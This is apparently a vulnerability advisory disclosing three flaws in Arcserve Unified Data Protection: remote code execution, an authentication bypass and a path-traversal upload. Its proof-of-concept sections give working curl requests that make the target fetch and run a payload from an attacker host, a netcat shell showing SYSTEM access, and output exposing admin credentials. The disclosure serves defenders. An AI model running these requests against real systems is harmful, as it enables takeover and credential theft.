Arcserve Unified Data Protection Multiple Vulnerabilities

CVE-2023-41998 - Arcserve UDP Unauthenticated RCE 

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

An unauthenticated, remote attacker can execute code remotely via the downloadAndInstallPatch() routine within “com.ca.arcflash.rps.webservice.RPSService4CPMImpl.” This routine allows users to upload and execute arbitrary files.

For example, when triggering this method, a malicious actor can cause the service to download a zip file from an attacker-controlled URL to <UDP_INSTALL_DIR>\Engine\BIN\patch\. The zip file is subsequently decompressed and a decompressed EXE file with the same file name as the zip file (i.e., foo.exe zipped to foo.zip) is then executed.

Proof of Concept

# On <attacker-host>, create a malicious zip/exe to be hosted and later referenced
# Run a web server to serve the zip file
# The webroot should be the parent directory because the download URL must have at least 4 slashes
/tmp/download# python3 -m http.server -d ../
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

# On a separate terminal, run:
curl -ki -H 'Content-Type: text/xml' -d '<?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:downloadAndInstallPatch xmlns:ns2="http://webservice.arcflash.ca.com"><arg0>http://<attacker-host>:8000/download/shell_bind_tcp.zip</arg0></ns2:downloadAndInstallPatch></S:Body></S:Envelope>' 'https://<target-host>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl'

# Connect to target host
nc <target-host> 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Program Files\Arcserve\Unified Data Protection\Common\Tomcat>whoami
whoami
nt authority\system

CVE-2023-41999 - Arcserve UDP Management Authentication Bypass 

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Arcserve UDP management console supports authentication with a UUID (i.e.,ValidateUserByUUID()). An unauthenticated remote attacker can obtain a valid authentication UUID to login to the console.

Once authenticated, the attacker can perform actions that require authentication. For example, the attacker can grab the "Edge Account" (i.e., Administrative) credentials.

Proof of Concept

python3 arcserve_udp_console_auth_bypass.py <target-host>
[*] Getting hostUuid
        [+] hostUuid: b86e10f6-60d5-4244-82ce-8afe90fc0170
[*] Calling validateUserByUUID
        [+] Login OK
[*] Calling getEdgeAccount
        [+] username: administrator
        [+] domain  : .
        [+] encrypted password: ca942ee002fb24339b5ff64ccdd647b9d131cdd5db10b59ca3b20c796365500d
        [+] decrypted password: Password123

CVE-2023-42000 - Arcserve UDP Agent Unauthenticated Path Traversal File Upload 

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

A path traversal vulnerability exists in com.ca.arcflash.ui.server.servlet.FileHandlingServlet.doUpload(). An unauthenticated remote attacker can exploit it to upload arbitrary files to any location on the file system where the UDP agent is installed.

Proof of Concept

echo -n 'malicious content' > /tmp/malicious_file
curl -ki -F 'file=@/tmp/malicious_file;filename=/../../../../../../../../../Windows/System32/malicious_file'  'https://<target-host>:8014/fileHandling?action=upload'